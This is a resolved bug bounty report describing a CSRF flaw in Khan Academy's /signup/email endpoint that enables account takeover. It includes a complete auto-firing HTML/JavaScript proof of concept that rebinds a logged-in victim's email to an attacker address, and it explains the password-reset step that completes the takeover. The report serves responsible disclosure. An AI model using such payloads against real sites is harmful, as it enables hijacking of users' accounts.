Cross-Site Request Forgery (CSRF) vulnerability on API endpoint allows account takeovers
Severity: High
Program: Khan Academy
Reported by rlaneth
Vulnerability Details
## Summary
The `/signup/email` API endpoint at [khanacademy.org](https://khanacademy.org) is vulnerable to Cross-Site Request Forgery (CSRF) attacks, allowing takeovers of accounts associated with unconfirmed email addresses.
## Description
The vulnerable endpoint allows an authenticated user to change the email address associated with their account if they have not yet confirmed the current address. However, it does not verify that the request was intentionally made by the user from the site itself: it neither checks the values of request headers (e.g. `Origin` or `Referer`) nor requires an anti-CSRF token, so a cross-site POST that carries the victim's session cookie is accepted as if the user had submitted the form.
## Proof-of-Concept (PoC)
This is the code used for the demonstration video attached to this report (ka-signup-email-csrf.mp4).
```html
<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8" />
    <title>Khan Academy Signup Email CSRF PoC</title>
    <style type="text/css">
      body {
        display: flex;
        flex-direction: column;
        justify-content: center;
        min-height: 100vh;
        margin: 0;
      }
      p {
        display: flex;
        align-self: center;
        font-size: 0.8rem;
        font-family: sans-serif;
        font-weight: bold;
        text-transform: uppercase;
        letter-spacing: 0.1rem;
      }
    </style>
  </head>
  <body>
    <p>Khan Academy Signup Email CSRF PoC</p>
    <script type="text/javascript">
      // Fire the forged request as soon as the page loads; the victim only
      // has to visit this page while logged in to khanacademy.org.
      window.addEventListener('load', function(e) {
        // Address controlled by the attacker; the victim's account is rebound to it.
        var attacker_addr = '[email protected]';
        var x = new XMLHttpRequest();
        x.open('POST', 'https://www.khanacademy.org/signup/email', true);
        // Attach the victim's khanacademy.org cookies to the cross-origin request.
        x.withCredentials = true;
        // A form-encoded body keeps this a "simple" request: no CORS preflight,
        // so the POST reaches the server even though the response is not readable.
        x.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
        x.send('email=' + encodeURIComponent(attacker_addr));
      }, false);
    </script>
  </body>
</html>
```
## Impact
An attacker can exploit this vulnerability to take over accounts: the forged request associates the victim's account with an address the attacker controls, and the attacker then requests a password reset, which is delivered to that address. For the attack to succeed, the target account must still be associated with an unconfirmed email address, and the target user must visit an attacker-controlled website while logged in, in a browser that sends the session cookie with the cross-site POST.
Report Details
State: Closed
Substate: Resolved
Weakness: Cross-Site Request Forgery (CSRF)